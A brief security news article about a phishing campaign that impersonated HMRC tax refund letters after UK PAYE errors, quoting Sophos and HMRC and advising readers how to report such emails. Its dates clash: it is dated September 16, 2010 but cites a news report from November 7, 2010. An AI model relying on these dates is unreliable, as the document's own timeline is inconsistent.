Hackers Capitalized on Tax Blunders in UK
Internet security firms 'Sophos' and 'GFI Security' have cautioned British people against the new email phishing scam exploiting Her Majesty's Revenue and Customs' (HMRC) recent tax errors letters to steal private details.
As per the news, almost 6 Million people in the UK paid the incorrect amount of tax due to HMRC mistakes with employee PAYE codes. Nearly 4.3 Million people have to get a refund whereas 1.4 Million demand to hand over an average of £1,428 each.
But hackers have not wasted any time and started sending new phishing mails to the concerned tax payers.
The phishing email seems to have been sent from the HMRC address with the subject line "You have an HMRC Refund." The email informs the users that they have paid extra amount of money and they have to fill an attached form to get their money back.
There is a file attached to the email 'Refund-Form. Zip', which carries a HTML file called 'Refund-Form.htm' which asks details such as credit card number, date of birth and mother's maiden name.
Graham Cluley, Senior Technology Consultant at Sophos, stated that if any user had filled the form in, his\her private data would be uploaded to a Chinese server and the user was phished, as per the news by Help Net Security on November 7, 2010.
Security experts said that hackers usually tried to collect users' bank details and then try to take money from their accounts. Not only users risk of having their accounts emptied but their private details are also sold to other hackers.
Chris Hopson, Director of Customer Contact at HMRC, stated that they informed the users about tax refund only in writing by post. He said that they never used phone calls, emails or external firms for this purpose.
Hopson added that users were advised that if they had got such a phone call to give any bank details, they should immediately report it to the police.
Further, he said that if users got an email claiming to be from HMRC, they should send it to them for investigation before deleting permanently.
Related article: Hackers Redirect Windows Live Search to Malicious Sites
» SPAMfighter News - 16-09-2010